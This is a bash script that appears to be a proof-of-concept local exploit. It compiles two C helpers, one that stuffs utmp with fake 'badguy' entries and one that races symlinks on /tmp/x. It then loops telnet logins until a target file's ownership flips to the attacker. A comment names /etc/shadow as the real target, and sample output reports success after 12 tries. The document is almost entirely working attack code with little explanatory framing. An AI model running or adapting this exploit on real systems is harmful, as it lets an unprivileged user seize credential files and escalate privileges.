#!/bin/bash - echo ' #include #include #include #include #include #include int main(int argc, char *argv[]) { struct utmp entry; int i; entry.ut_type=LOGIN_PROCESS; strcpy(entry.ut_line,"/tmp/x"); entry.ut_time=0; strcpy(entry.ut_user,"badguy"); strcpy(entry.ut_host,"badhost"); entry.ut_addr=0; for(i=1;i<9;i++) { entry.ut_pid=(pid_t)( i + (int)getpid() ); sprintf(entry.ut_id,"bad%d",i); pututline(&entry); } } ' > /tmp/fillutmp.c cc -o /tmp/fillutmp /tmp/fillutmp.c echo 'Ask someone with group utmp privileges to do:' echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp' echo -n 'Press [RETURN] to continue... ' read ANS echo ' #include int main(int argc, char *argv[]) { while(1) { unlink("/tmp/x"); symlink(argv[1],"/tmp/x"); unlink("/tmp/x"); symlink(argv[2],"/tmp/x"); } } ' > /tmp/jigglelnk.c cc -o /tmp/jigglelnk /tmp/jigglelnk.c HOST=`hostname` # or simply localhost? echo "Which tty do you think a 'telnet $HOST' will use next?" echo "(Do that telnet and see...)" read TTY echo "You said it will be '$TTY' ..." ATK=/etc/debian_version # should be /etc/shadow echo "Starting symlink re-jiggler ..." /tmp/jigglelnk $TTY $ATK & JIG=$! LOOP=0 while :; do ((LOOP = $LOOP + 1)) echo; echo; echo "Try = $LOOP" /tmp/fillutmp echo "Telnetting... if login succeeds, just exit for next try..." /usr/bin/telnet $HOST LS=`ls -ld $ATK` case "$LS" in *root*root* ) ;; # not done yet... * ) echo; echo echo "Success after $LOOP tries!" echo "$LS" echo; echo break ;; esac done kill $JIG rm /tmp/fillutmp /tmp/jigglelnk /tmp/x # ... # ~$ logout # Connection closed by foreign host. # Success after 12 tries! # -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version